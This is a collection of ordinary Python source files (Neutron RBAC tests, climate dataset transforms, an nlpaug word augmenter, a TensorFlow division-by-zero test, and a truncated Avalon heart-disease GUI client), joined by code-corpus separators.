obj_id = 'fake_obj_id'
obj = self._test_class(mock.Mock())
obj.update_shared(is_shared_new=True, obj_id=obj_id)
get_object_mock.assert_called_with(
obj.rbac_db_cls, mock.ANY, object_id=obj_id,
target_tenant='*', action=rbac_db_models.ACCESS_SHARED)
self.assertFalse(mock_validate_delete.called)
self.assertFalse(attach_rbac_mock.called)
@mock.patch.object(_test_class, 'attach_rbac')
@mock.patch.object(obj_db_api, 'get_object', return_value=[])
@mock.patch.object(_test_class, '_validate_rbac_policy_delete')
def test_update_shared_wildcard(
self, mock_validate_delete, get_object_mock, attach_rbac_mock):
obj_id = 'fake_obj_id'
test_neutron_obj = self._test_class(mock.Mock())
test_neutron_obj.update_shared(is_shared_new=True, obj_id=obj_id)
get_object_mock.assert_called_with(
test_neutron_obj.rbac_db_cls, mock.ANY, object_id=obj_id,
target_tenant='*', action=rbac_db_models.ACCESS_SHARED)
attach_rbac_mock.assert_called_with(
obj_id, test_neutron_obj.obj_context.project_id)
def test_shared_field_false_without_context(self):
test_neutron_obj = self._test_class()
self.assertFalse(test_neutron_obj.to_dict()['shared'])
@mock.patch.object(_test_class, 'attach_rbac')
@mock.patch.object(obj_db_api, 'get_object',
return_value=['fake_rbac_policy'])
@mock.patch.object(_test_class, '_validate_rbac_policy_delete')
def test_update_shared_remove_wildcard_sharing(
self, mock_validate_delete, get_object_mock, attach_rbac_mock):
obj_id = 'fake_obj_id'
obj = self._test_class(mock.Mock())
obj.update_shared(is_shared_new=False, obj_id=obj_id)
get_object_mock.assert_called_with(
obj.rbac_db_cls, mock.ANY, object_id=obj_id,
target_tenant='*', action=rbac_db_models.ACCESS_SHARED)
self.assertFalse(attach_rbac_mock.attach_rbac.called)
mock_validate_delete.assert_called_with(mock.ANY, obj_id, '*')
@mock.patch.object(_test_class, 'create_rbac_policy')
def test_attach_rbac_returns_type(self, create_rbac_mock):
obj_id = 'fake_obj_id'
project_id = 'fake_project_id'
target_tenant = 'fake_target_project'
self._test_class(mock.Mock()).attach_rbac(obj_id, project_id,
target_tenant)
rbac_pol = create_rbac_mock.call_args_list[0][0][1]['rbac_policy']
self.assertEqual(rbac_pol['object_id'], obj_id)
self.assertEqual(rbac_pol['target_tenant'], target_tenant)
self.assertEqual(rbac_pol['action'], rbac_db_models.ACCESS_SHARED)
self.assertEqual(rbac_pol['object_type'],
self._test_class.rbac_db_cls.db_model.object_type)
|
py | 1a306f6dbf62485a1faeac3dfb2b6ee640b6a2b7 | """Various constants and distributions that decribe our dataset. Intended use
is normalization of the fields before sending them to a neural net.
See notebook distributions-of-parameters.ipynb"""
import logging
import numpy as np
import torch
import random
import xarray as xr
from .util import add_biweekly_dim, obs_to_biweekly, std_estimator, fix_s2s_dataset_dims
_logger = logging.getLogger(__name__)
FIELD_MEAN = {
"gh10": 30583.0,
"gh100": 16070.0,
"gh1000": 76.19,
"gh200": 11765.0,
"gh500": 5524.374,
"gh850": 1403.0,
"lsm": 0.0,
"msl": 100969.28,
"orog": 387.1,
"siconc": 0.17,
"sst": 286.96,
"st100": 268.75,
"st20": 268.69,
"sm20": 250.68,
"t2m": 278.2237,
"tp": 34.1,
"u1000": -0.17,
"u850": 1.26,
"u500": 6.43,
"u200": 14.43,
"u100": 5.30,
"v1000": 0.18,
"v850": 0.11,
"v500": -0.03,
"v200": -0.01,
"v100": 0.10,
}
FIELD_STD = {
"gh10": 993.0,
"gh100": 577.0,
"gh1000": 110.14,
"gh200": 605.0,
"gh500": 341.80862,
"gh850": 149.6,
"lsm": 1.0,
"msl": 1343.6,
"orog": 856.0,
"siconc": 0.35,
"sst": 11.73,
"st100": 26.74,
"st20": 26.91,
"sm20": 125.99,
"tp": 43.7,
"t2m": 21.2692,
"u1000": 6.09,
"u850": 8.07,
"u500": 11.73,
"u200": 17.76,
"u100": 12.02,
"v1000": 5.22,
"v850": 6.144,
"v500": 9.03,
"v200": 12.18,
"v100": 6.57,
}
def normalize_dataset(dataset):
for v in dataset.data_vars:
dataset[v] = (dataset[v] - FIELD_MEAN[v]) / FIELD_STD[v]
return dataset
def denormalize_dataset(dataset):
for v in dataset.data_vars:
dataset[v] = (dataset[v] * FIELD_STD[v]) + FIELD_MEAN[v]
return dataset
def apply_to_all(transform, example):
"""Utility function to apply a transform on all the kews of an example."""
new_example = {}
for k in example:
new_example[k] = transform(example[k])
return new_example
class AddBiweeklyDimTransform:
"""Transform that takes a training example and adds the biweekly dimension to it."""
def __init__(self, weeks_12=False, features=False):
self.weeks_12 = weeks_12
self.features = features
def __call__(self, example):
to_transform = ["model", "obs"]
if self.features:
to_transform.append("features")
new_example = {}
for k in example:
if k in to_transform:
new_example[k] = add_biweekly_dim(example[k], weeks_12=self.weeks_12)
else:
new_example[k] = example[k]
return new_example
class AddMetadata:
"""Add various metadata to the example dict."""
def __call__(self, example):
model = example["terciles"]
year = int(model.forecast_time.dt.year)
month = int(model.forecast_time.dt.month)
day = int(model.forecast_time.dt.day)
example["monthday"] = f"{month:02}{day:02}"
example["month"] = f"{month:02}"
example["year"] = f"{year:04}"
example["latitude"] = model.latitude
example["longitude"] = model.longitude
return example
class AddDryMask:
def __init__(self, threshold=0.01):
self.threshold = threshold
def __call__(self, example):
edges = example["edges"]
wet_mask = (edges.isel(category_edge=0) > self.threshold).drop("t2m")
example["dry_mask"] = ~wet_mask
return example
class ExampleToPytorch:
def __call__(self, example):
pytorch_example = {}
for dataset_name in [
"obs",
"model",
"features",
"terciles",
"edges",
"model_parameters",
"dry_mask",
"eccc_parameters",
"ncep_parameters",
]:
if dataset_name in example:
dataset = example[dataset_name]
for variable in dataset.data_vars:
new_key = f"{dataset_name}_{variable}"
pytorch_example[new_key] = torch.from_numpy(dataset[variable].data)
for k in ["year", "monthday", "month", "eccc_available", "ncep_available"]:
pytorch_example[k] = example[k]
for k in ["latitude", "longitude"]:
pytorch_example[k] = torch.from_numpy(example[k].data)
return pytorch_example
class CompositeTransform:
def __init__(self, transforms):
self.transforms = transforms
def __call__(self, example):
transformed_example = example
for t in self.transforms:
transformed_example = t(transformed_example)
return transformed_example
def __repr__(self):
inner_str = ", ".join([repr(t) for t in self.transforms])
return f"CompositeTransform([{inner_str}])"
def t2m_to_normal(model):
model_t2m_mean = model.t2m.mean(dim=["lead_time", "realization"]).rename("t2m_mu")
model_t2m_std = std_estimator(model.t2m, dim=["lead_time", "realization"]).rename(
"t2m_sigma"
)
return xr.merge([model_t2m_mean, model_t2m_std]).rename(
biweekly_forecast="lead_time"
)
def tp_to_normal(model):
model_tp_mean = model.tp.isel(lead_time=-1).mean(dim="realization").rename("tp_mu")
model_tp_std = std_estimator(model.tp.isel(lead_time=-1), dim="realization").rename(
"tp_sigma"
)
return (
xr.merge([model_tp_mean, model_tp_std])
.drop("lead_time")
.rename(biweekly_forecast="lead_time")
)
def model_to_distribution(model):
model_t2m = t2m_to_normal(model)
model_tp = tp_to_normal(model)
return xr.merge([model_t2m, model_tp])
class LinearModelAdapter:
def __init__(self, make_distributions=True):
self.make_distributions = make_distributions
def __call__(self, example):
if self.make_distributions:
example["model"] = model_to_distribution(example["model"])
example["obs"] = obs_to_biweekly(example["obs"])
return example
class CubeRootTP:
"""Apply a cubic root on precipitation data."""
def __init__(self):
pass
def __call__(self, example):
for k in ["obs_tp", "edges_tp"]:
if k in example:
example[k] = example[k] ** (1.0 / 3.0)
return example
class AddLatLonFeature:
def __init__(self):
pass
def __call__(self, example):
obs = example["terciles"]
lat_array = obs["latitude"].assign_coords(variable="lat")
lat_array = (lat_array / lat_array.max()).astype("float32")
lon_array = obs["longitude"].assign_coords(variable="lon")
lon_array = np.sin(np.deg2rad(lon_array)).astype("float32")
features_array = example["features"].features
catted_features = xr.concat(
[features_array, lat_array, lon_array], dim="variable"
)
example["features"] = catted_features.to_dataset()
return example
class AddGeographyFeatures:
def __init__(self, geography_file):
geo_dataset = fix_s2s_dataset_dims(xr.open_dataset(geography_file))
subset = geo_dataset[["orog"]]
geo = normalize_dataset(subset)
self.geo_features = geo.to_array().to_dataset(name="features")
def __call__(self, batch):
features = batch["features"]
geo_at_lead = self.geo_features.sel(lead_time=features.lead_time)
new_features_dataset = xr.concat([features, geo_at_lead], dim="variable")
batch["features"] = new_features_dataset
return batch
class RandomNoise:
def __init__(self, keys=["features_features"], sigma=0.01):
self.keys = keys
self.sigma = sigma
def __call__(self, example):
for k in self.keys:
x = example[k]
example[k] += self.sigma * torch.randn_like(x)
return example
class LongitudeRoll:
def __init__(self):
pass
def __call__(self, example):
obs = example["terciles"]
longitude_length = obs.sizes["longitude"]
roll = random.randint(0, longitude_length)
rolled_example = example
for k in example:
if k not in ["eccc_available", "ncep_available"]:
rolled_dataset = (
example[k].roll(longitude=roll, roll_coords=True).drop("longitude")
)
rolled_example[k] = rolled_dataset
return rolled_example
class MembersSubsetTransform:
def __init__(self, subset_size=1):
self.subset_size = subset_size
def __call__(self, example):
features = example["features"]
n_members = features.sizes["realization"]
members = sorted(random.choices(range(n_members), k=self.subset_size))
features = features.isel(realization=members)
example["features"] = features
return example
class AddDateFeatureTransform:
def __call__(self, example):
features = example["features"]
date_features = np.sin(
features.valid_time.assign_coords(variable="date").dt.dayofyear / 366
)
new_features = xr.concat(
[features.features, date_features], dim="variable"
).astype("float32")
example["features"] = new_features.to_dataset()
return example
class VariableFilterTransform:
def __init__(self, to_filter=None):
self.to_filter = to_filter
if to_filter is not None:
_logger.info("Will filter vars: %s", to_filter)
def __call__(self, batch):
if self.to_filter is not None:
batch["features"] = batch["features"].sel(variable=self.to_filter)
return batch
def full_transform(
geography_file,
weeks_12=False,
make_distributions=False,
random_noise_sigma=0.0,
roll=False,
n_members=1,
filter_vars=None,
biweekly_features=False,
add_date=False,
):
xarray_transforms = [
MembersSubsetTransform(n_members),
AddLatLonFeature(),
AddGeographyFeatures(geography_file),
VariableFilterTransform(filter_vars),
AddBiweeklyDimTransform(weeks_12, features=biweekly_features),
]
if add_date:
xarray_transforms.insert(2, AddDateFeatureTransform())
if roll:
xarray_transforms.append(LongitudeRoll())
transforms = [
*xarray_transforms,
# LinearModelAdapter(make_distributions=make_distributions),
AddMetadata(),
ExampleToPytorch(),
CubeRootTP(),
RandomNoise(sigma=random_noise_sigma),
]
return CompositeTransform(transforms)
|
py | 1a306f8e75fc5c36e9eaee2fea00ba106b3d312e | """
Augmenter that apply random word operation to textual input.
"""
from nlpaug.augmenter.word import WordAugmenter
from nlpaug.util import Action, Doc
class RandomWordAug(WordAugmenter):
"""
Augmenter that apply randomly behavior for augmentation.
:param str action: 'substitute', 'swap', 'delete' or 'crop'. If value is 'swap', adjacent words will be swapped randomly.
If value is 'delete', word will be removed randomly. If value is 'crop', a set of contunous word will be removed randomly.
:param float aug_p: Percentage of word will be augmented.
:param int aug_min: Minimum number of word will be augmented.
:param int aug_max: Maximum number of word will be augmented. If None is passed, number of augmentation is
calculated via aup_p. If calculated result from aug_p is smaller than aug_max, will use calculated result from
aug_p. Otherwise, using aug_max.
:param list stopwords: List of words which will be skipped from augment operation. Not effective if action is 'crop'
:param str stopwords_regex: Regular expression for matching words which will be skipped from augment operation. Not effective if action is 'crop'
:param list target_words: List of word for replacement (used for substitute operation only). Default value is _.
:param func tokenizer: Customize tokenization process
:param func reverse_tokenizer: Customize reverse of tokenization process
:param str name: Name of this augmenter
>>> import nlpaug.augmenter.word as naw
>>> aug = naw.RandomWordAug()
"""
def __init__(self, action=Action.DELETE, name='RandomWord_Aug', aug_min=1, aug_max=10, aug_p=0.3, stopwords=None,
target_words=None, tokenizer=None, reverse_tokenizer=None, stopwords_regex=None,
verbose=0):
super().__init__(
action=action, name=name, aug_p=aug_p, aug_min=aug_min, aug_max=aug_max, stopwords=stopwords,
tokenizer=tokenizer, reverse_tokenizer=reverse_tokenizer, device='cpu', verbose=verbose,
stopwords_regex=stopwords_regex, include_detail=False)
self.target_words = target_words or ['_']
# https://arxiv.org/pdf/1711.02173.pdf, https://arxiv.org/pdf/1809.02079.pdf, https://arxiv.org/pdf/1903.09460.pdf
def swap(self, data):
if not data or not data.strip():
return data
change_seq = 0
doc = Doc(data, self.tokenizer(data))
aug_idxes = self._get_random_aug_idxes(doc.get_original_tokens())
# https://github.com/makcedward/nlpaug/issues/76
if aug_idxes is None or len(aug_idxes) == 0 or doc.size() < 2:
if self.include_detail:
return data, []
return data
for aug_idx in aug_idxes:
swap_idx = self._get_swap_position(aug_idx, doc.size() - 1)
change_seq += 1
doc = self.change_case(doc, aug_idx, swap_idx, change_seq)
if self.include_detail:
return self.reverse_tokenizer(doc.get_augmented_tokens()), doc.get_change_logs()
else:
return self.reverse_tokenizer(doc.get_augmented_tokens())
# TODO: Tune it
def change_case(self, doc, original_word_idx, swap_word_idx, change_seq):
original_token = doc.get_token(original_word_idx).get_latest_token().token
swap_token = doc.get_token(swap_word_idx).get_latest_token().token
if original_word_idx != 0 and swap_word_idx != 0:
doc.add_change_log(original_word_idx, new_token=swap_token, action=Action.SWAP,
change_seq=self.parent_change_seq+change_seq)
doc.add_change_log(swap_word_idx, new_token=original_token, action=Action.SWAP,
change_seq=self.parent_change_seq+change_seq)
return doc
original_token_case = self.get_word_case(original_token)
swap_token_case = self.get_word_case(swap_token)
if original_word_idx == 0:
if original_token_case == 'capitalize' and swap_token_case == 'lower':
doc.add_change_log(original_word_idx, new_token=swap_token.capitalize(),
action=Action.SWAP, change_seq=self.parent_change_seq+change_seq)
else:
doc.add_change_log(original_word_idx, new_token=swap_token,
action=Action.SWAP, change_seq=self.parent_change_seq+change_seq)
if original_token_case == 'capitalize':
doc.add_change_log(swap_word_idx, new_token=original_token.lower(),
action=Action.SWAP, change_seq=self.parent_change_seq+change_seq)
else:
doc.add_change_log(swap_word_idx, new_token=original_token,
action=Action.SWAP, change_seq=self.parent_change_seq+change_seq)
if swap_word_idx == 0:
if original_token_case == 'lower':
doc.add_change_log(swap_word_idx, new_token=original_token.capitalize(),
action=Action.SWAP, change_seq=self.parent_change_seq+change_seq)
else:
doc.add_change_log(swap_word_idx, new_token=original_token,
action=Action.SWAP, change_seq=self.parent_change_seq+change_seq)
if swap_token_case == 'capitalize':
doc.add_change_log(original_word_idx, new_token=swap_token.lower(),
action=Action.SWAP, change_seq=self.parent_change_seq+change_seq)
else:
doc.add_change_log(original_word_idx, new_token=swap_token,
action=Action.SWAP, change_seq=self.parent_change_seq+change_seq)
# Special case for i
if doc.get_token(original_word_idx).get_latest_token().token == 'i':
doc.update_change_log(original_word_idx, token='I')
if doc.get_token(swap_word_idx).get_latest_token().token == 'i':
doc.update_change_log(swap_word_idx, token='I')
return doc
def _get_swap_position(self, pos, token_length):
if pos == 0:
# Force swap with next character if it is first character
return pos + 1
elif pos == token_length:
# Force swap with previous character if it is last character
return pos - 1
else:
return pos + self.sample([-1, 1], 1)[0]
# https://arxiv.org/pdf/1703.02573.pdf, https://arxiv.org/pdf/1712.06751.pdf, https://arxiv.org/pdf/1806.09030.pdf
# https://arxiv.org/pdf/1905.11268.pdf,
def substitute(self, data):
if not data or not data.strip():
return data
change_seq = 0
doc = Doc(data, self.tokenizer(data))
aug_idxes = self._get_random_aug_idxes(doc.get_original_tokens())
aug_idxes.sort(reverse=True)
if aug_idxes is None or len(aug_idxes) == 0:
if self.include_detail:
return data, []
return data
for aug_idx in aug_idxes:
original_token = doc.get_token(aug_idx).orig_token.token
new_token = self.sample(self.target_words, 1)[0]
if aug_idx == 0:
new_token = self.align_capitalization(original_token, new_token)
change_seq += 1
doc.add_change_log(aug_idx, new_token=new_token, action=Action.SUBSTITUTE, change_seq=self.parent_change_seq+change_seq)
if self.include_detail:
return self.reverse_tokenizer(doc.get_augmented_tokens()), doc.get_change_logs()
else:
return self.reverse_tokenizer(doc.get_augmented_tokens())
# https://arxiv.org/pdf/1905.11268.pdf, https://arxiv.org/pdf/1809.02079.pdf, https://arxiv.org/pdf/1903.09460.pdf
def delete(self, data):
if not data or not data.strip():
return data
change_seq = 0
doc = Doc(data, self.tokenizer(data))
aug_idxes = self._get_random_aug_idxes(doc.get_original_tokens())
aug_idxes.sort(reverse=True)
# https://github.com/makcedward/nlpaug/issues/76
if aug_idxes is None or len(aug_idxes) == 0 or doc.size() < 2:
if self.include_detail:
return data, []
return data
for aug_idx in aug_idxes:
original_token = doc.get_token(aug_idx).orig_token.token
change_seq += 1
doc.add_change_log(aug_idx, new_token='', action=Action.DELETE, change_seq=self.parent_change_seq+change_seq)
if aug_idx == 0:
new_token = self.align_capitalization(original_token, doc.get_token(1).orig_token.token)
doc.add_change_log(1, new_token=new_token, action=Action.ALIGN, change_seq=self.parent_change_seq+change_seq)
if self.include_detail:
return self.reverse_tokenizer(doc.get_augmented_tokens()), doc.get_change_logs()
else:
return self.reverse_tokenizer(doc.get_augmented_tokens())
# https://github.com/makcedward/nlpaug/issues/126
def crop(self, data):
if not data or not data.strip():
return data
change_seq = 1
doc = Doc(data, self.tokenizer(data))
aug_idxes = self._get_aug_range_idxes(doc.get_original_tokens())
aug_idxes.sort(reverse=True)
# https://github.com/makcedward/nlpaug/issues/76
if aug_idxes is None or len(aug_idxes) == 0 or doc.size() < 2:
if self.include_detail:
return data, []
return data
for aug_idx in aug_idxes:
original_token = doc.get_token(aug_idx).orig_token.token
doc.add_change_log(aug_idx, new_token='', action=Action.CROP, change_seq=self.parent_change_seq+change_seq)
if aug_idx == 0:
new_token = self.align_capitalization(original_token, doc.get_token(1).orig_token.token)
doc.add_change_log(1, new_token=new_token, action=Action.ALIGN, change_seq=self.parent_change_seq+change_seq)
if self.include_detail:
return self.reverse_tokenizer(doc.get_augmented_tokens()), doc.get_change_logs()
else:
return self.reverse_tokenizer(doc.get_augmented_tokens())
|
py | 1a306ffcdb9dc4ddf95e5ed6a658059fb7050757 | # Copyright 2015 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for integer division by zero."""
from tensorflow.python.framework import constant_op
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import errors
from tensorflow.python.framework import test_util
from tensorflow.python.platform import test
class ZeroDivisionTest(test.TestCase):
def testZeros(self):
with test_util.use_gpu():
for dtype in dtypes.uint8, dtypes.int16, dtypes.int32, dtypes.int64:
zero = constant_op.constant(0, dtype=dtype)
one = constant_op.constant(1, dtype=dtype)
bads = [lambda x, y: x // y]
if dtype in (dtypes.int32, dtypes.int64):
bads.append(lambda x, y: x % y)
for bad in bads:
try:
result = self.evaluate(bad(one, zero))
except (errors.OpError, errors.InvalidArgumentError) as e:
# Ideally, we'd get a nice exception. In theory, this should only
# happen on CPU, but 32 bit integer GPU division is actually on
# CPU due to a placer bug.
# TODO(irving): Make stricter once the placer bug is fixed.
self.assertIn('Integer division by zero', str(e))
else:
# On the GPU, integer division by zero produces all bits set.
# But apparently on some GPUs "all bits set" for 64 bit division
# means 32 bits set, so we allow 0xffffffff as well. This isn't
# very portable, so we may need to expand this list if other GPUs
# do different things.
#
# XLA constant folds integer division by zero to 1.
self.assertTrue(test.is_gpu_available())
self.assertIn(result, (-1, 1, 2, 0xff, 0xffffffff))
if __name__ == '__main__':
test.main()
|
py | 1a307057e4332a646673c0910d799d5bbcafe4c8 | #! /usr/bin/env python3
# Copyright 2019 Intel Corporation
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
Heart Evaluation GUI Client for use in submitting data to worker.
"""
import os
import sys
import random
import json
import argparse
import logging
import secrets
# Tkinter imports
import tkinter as tk
import tkinter.messagebox as messagebox
import tkinter.font as font
from PIL import ImageTk, Image
# Avalon imports
import crypto_utils.crypto_utility as utility
import avalon_sdk.worker.worker_details as worker
from avalon_sdk.worker.worker_details import WorkerType
from avalon_sdk.work_order.work_order_params import WorkOrderParams
from avalon_sdk.direct.avalon_direct_client import AvalonDirectClient
import config.config as pconfig
import utility.logger as plogger
import crypto_utils.crypto.crypto as crypto
from error_code.error_status import WorkOrderStatus, ReceiptCreateStatus
import crypto_utils.signature as signature
from error_code.error_status import SignatureStatus
from avalon_sdk.work_order_receipt.work_order_receipt \
import WorkOrderReceiptRequest
# Remove duplicate loggers
for handler in logging.root.handlers[:]:
logging.root.removeHandler(handler)
logger = logging.getLogger(__name__)
# Default TCFHOME assumes PWD is examples/apps/heart_disease_eval/client :
TCFHOME = os.environ.get("TCF_HOME", "../../../../")
# GUI color scheme
BACKGROUND = "light sky blue"
ENTRY_COLOR = "light grey"
BUTTON_COLOR = "deep sky blue"
RESULT_BACKGROUND = "pale goldenrod"
# -----------------------------------------------------------------
def _generate_random_or_normal_number(normal, percent_normal, low, high):
"""Generate number "normal" for "percent_normal" % of the time.
Otherwise, generate a random number in the interval ["low", "high"].
"""
if percent_normal >= random.randint(0, 100):
return normal
return random.randint(low, high)
def _generate_random_data():
"""Generate a random data string for input as evaluation data.
For example: "35 0 1 67 102 125 1 95 0 10 1 1 3 1"
"""
age = _generate_random_or_normal_number(35, 67, 18, 100)
sex = _generate_random_or_normal_number(0, 50, 1, 1)
cp = _generate_random_or_normal_number(4, 67, 1, 3)
trestbps = _generate_random_or_normal_number(67, 67, 108, 218)
chol = _generate_random_or_normal_number(102, 67, 126, 309)
fbs = _generate_random_or_normal_number(125, 67, 98, 248)
restecg = _generate_random_or_normal_number(0, 67, 1, 2)
thalach = _generate_random_or_normal_number(95, 67, 61, 198)
exang = _generate_random_or_normal_number(0, 67, 1, 1)
oldpeak = _generate_random_or_normal_number(10, 67, 0, 100)
slop = _generate_random_or_normal_number(0, 67, 1, 2)
ca = _generate_random_or_normal_number(0, 67, 1, 3)
thaldur = _generate_random_or_normal_number(3, 67, 6, 7)
num = _generate_random_or_normal_number(0, 67, 1, 1)
return "{} {} {} {} {} {} {} {} {} {} {} {} {} {}".format(
age, sex, cp, trestbps, chol, fbs, restecg, thalach,
exang, oldpeak, slop, ca, thaldur, num)
def _int_validate(text):
"""Validates that input is a non-negative integer."""
if str.isdigit(text) or text == "":
return True
else:
return False
def _float_validate(text):
"""Validates that input is a non-negative, non-special float."""
if text == "":
return True
try:
float(text)
if float(text) < 0.0 or float(text) == float("NaN") \
or float(text) == float("INF") \
or float(text) == float("-INF"):
return False
return True
except ValueError:
return False
class intEntry:
"""User entry for non-negative integer."""
def __init__(self, master, name):
global cur_row
label = tk.Label(master, text=name, background=BACKGROUND)
label.grid(row=cur_row, column=0, sticky="e", pady=(5, 0))
validate = (master.register(_int_validate))
self.entry = tk.Entry(
master, validate="all",
validatecommand=(validate, "%P"), width=5,
background=ENTRY_COLOR)
self.entry.grid(
row=cur_row, column=1, padx=(10, 0), pady=(5, 0), sticky="w")
cur_row += 1
def get(self):
# Fails if empty field
try:
return int(self.entry.get())
except ValueError:
return None
def enable(self):
self.entry.config(state=tk.NORMAL)
def disable(self):
self.entry.config(state=tk.DISABLED)
class floatEntry:
"""User entry for non-negative, non-special floating point number."""
def __init__(self, master, name):
global cur_row
label = tk.Label(master, text=name, background=BACKGROUND)
label.grid(row=cur_row, column=0, sticky="e", pady=(5,))
validate = (master.register(_float_validate))
self.entry = tk.Entry(
master, validate="all",
validatecommand=(validate, "%P"), width=10,
background=ENTRY_COLOR)
self.entry.grid(row=cur_row, column=1, padx=(10, 0), pady=(5,),
sticky="w")
cur_row += 1
def get(self):
try:
return float(self.entry.get())
except ValueError:
return None
def enable(self):
self.entry.config(state=tk.NORMAL)
def disable(self):
self.entry.config(state=tk.DISABLED)
class radio:
"""User entry for a radio button."""
# Options is a list of text-value pairs
def __init__(self, master, name, options):
global cur_row
if not all(len(tup) == 2 for tup in options):
print("ERROR: Mismatched text-value pairs")
exit(1)
self.var = tk.IntVar()
self.var.set(None)
label = tk.Label(master, text=name, background=BACKGROUND)
label.grid(row=cur_row, column=0, pady=(5, 0), sticky="e")
self.button_list = []
for i in range(len(options)):
button = tk.Radiobutton(
master, text=options[i][0],
variable=self.var, value=options[i][1],
background=BACKGROUND)
self.button_list.append(button)
if i == 0:
button.grid(row=cur_row, column=1, pady=(5, 0),
sticky="w")
else:
button.grid(row=cur_row, column=1, sticky="w")
cur_row += 1
def get(self):
try:
return self.var.get()
except tk.TclError:
return None
def enable(self):
for button in self.button_list:
button.config(state=tk.NORMAL)
def disable(self):
for button in self.button_list:
button.config(state=tk.DISABLED)
class resultWindow(tk.Toplevel):
"""Create result window that appears after clicking "Evaluate"."""
def __init__(self, parent, message):
tk.Toplevel.__init__(self, parent)
self.config(background=RESULT_BACKGROUND)
self.parent = parent
# Lock main window
self.transient(parent)
self.grab_set()
self.initial_focus = self
self.initial_focus.focus_set()
self.title("Evaluation Result")
self.protocol("WM_DELETE_WINDOW", self.close)
# Main content
self.main_frame = tk.Frame(self, background=RESULT_BACKGROUND)
self.main_frame.pack()
self.frame1 = tk.Frame(self.main_frame)
self.frame1.pack(side=tk.LEFT)
self.result_text = tk.StringVar()
self.label = tk.Label(
self.frame1, textvariable=self.result_text, width=45,
background=RESULT_BACKGROUND)
default_font = font.Font(font="TkDefaultFont")
new_font = default_font
new_font.config(weight=font.BOLD)
self.label.config(font=new_font)
self.label.pack()
# JSON window display sidebar buttons
self.frame2 = tk.Frame(self.main_frame, background=RESULT_BACKGROUND)
self.frame2.pack(side=tk.LEFT)
self.frame2 = tk.Frame(
self.frame2, background=RESULT_BACKGROUND)
self.frame2.pack(side=tk.LEFT)
self.request_button = tk.Button(
self.frame2, text="View Request", command=self.request,
background=BUTTON_COLOR)
self.request_button.pack(fill=tk.X, padx=(0, 10), pady=(10, 0))
self.result_button = tk.Button(
self.frame2, text="View Result", command=self.result,
background=BUTTON_COLOR)
self.result_button.pack(fill=tk.X, padx=(0, 10), pady=(10, 0))
self.receipt_button = tk.Button(
self.frame2, text="View Receipt",
command=self.receipt, background=BUTTON_COLOR)
self.receipt_button.pack(fill=tk.X, padx=(0, 10), pady=(10, 0))
# Close button
self.close_button = tk.Button(
self, text="Close",
command=self.close, background=BUTTON_COLOR)
self.close_button.pack(pady=(0, 5))
self.evaluate(message)
def evaluate(self, message):
"""Create and submit workorder and wait for result."""
self.result_text.set("Waiting for evaluation result...")
self.update()
# Create, sign, and submit workorder.
# Convert workloadId to hex.
workload_id = "heart-disease-eval"
workload_id = workload_id.encode("UTF-8").hex()
session_iv = utility.generate_iv()
session_key = utility.generate_key()
requester_nonce = secrets.token_hex(16)
work_order_id = secrets.token_hex(32)
requester_id = secrets.token_hex(32)
wo_params = WorkOrderParams(
work_order_id, worker_id, workload_id, requester_id,
session_key, session_iv, requester_nonce,
result_uri=" ", notify_uri=" ",
worker_encryption_key=worker_obj.encryption_key,
data_encryption_algorithm="AES-GCM-256"
)
wo_params.add_in_data(message)
wo_params.add_encrypted_request_hash()
private_key = utility.generate_signing_keys()
if requester_signature:
# Add requester signature and requester verifying_key
if wo_params.add_requester_signature(private_key) is False:
logger.info("Work order request signing failed")
exit(1)
# Set text for JSON sidebar
req_id = 51
self.request_json = wo_params.to_jrpc_string(req_id)
work_order_instance = direct_jrpc.get_work_order_instance()
response = work_order_instance.work_order_submit(
wo_params.get_work_order_id(),
wo_params.get_worker_id(),
wo_params.get_requester_id(),
wo_params.to_string(),
id=req_id
)
logger.info("Work order submit response : {}\n ".format(
json.dumps(response, indent=4)
))
if "error" in response and response["error"]["code"] != \
WorkOrderStatus.PENDING:
sys.exit(1)
# Create work order receipt
req_id += 1
wo_receipt_instance = direct_jrpc.get_work_order_receipt_instance()
wo_request = json.loads(self.request_json)
wo_receipt_obj = WorkOrderReceiptRequest()
wo_create_receipt = wo_receipt_obj.create_receipt(
wo_request,
ReceiptCreateStatus.PENDING.value,
private_key
)
logger.info("Work order create receipt request : {} \n \n ".format(
json.dumps(wo_create_receipt, indent=4)
))
# Submit work order create receipt jrpc request
wo_receipt_resp = wo_receipt_instance.work_order_receipt_create(
wo_create_receipt["workOrderId"],
wo_create_receipt["workerServiceId"],
wo_create_receipt["workerId"],
wo_create_receipt["requesterId"],
wo_create_receipt["receiptCreateStatus"],
wo_create_receipt["workOrderRequestHash"],
wo_create_receipt["requesterGeneratedNonce"],
wo_create_receipt["requesterSignature"],
wo_create_receipt["signatureRules"],
wo_create_receipt["receiptVerificationKey"],
req_id
)
logger.info("Work order create receipt response : {} \n \n ".format(
wo_receipt_resp
))
# Retrieve result and set GUI result text
res = work_order_instance.work_order_get_result(
work_order_id,
req_id
)
self.result_json = json.dumps(res, indent=4)
if "result" in res:
sig_obj = signature.ClientSignature()
status = sig_obj.verify_signature(
res, worker_obj.verification_key)
try:
if status == SignatureStatus.PASSED:
logger.info("Signature verification Successful")
decrypted_res = utility. \
decrypted_response(res, session_key, session_iv)
logger.info("\n" +
"Decrypted response:\n {}".
format(decrypted_res))
else:
logger.info("Signature verification Failed")
sys.exit(1)
except Exception as err:
logger.info("ERROR: Failed to decrypt response: %s", str(err))
sys.exit(1)
else:
logger.info("\n Work order get result failed {}\n".format(res))
sys.exit(1)
# Set text for JSON sidebar
self.result_text.set(
decrypted_res[0]["data"])
# Retrieve receipt
# Set text for JSON sidebar
req_id += 1
self.receipt_json = json.dumps(
wo_receipt_instance.work_order_receipt_retrieve(
work_order_id,
req_id
),
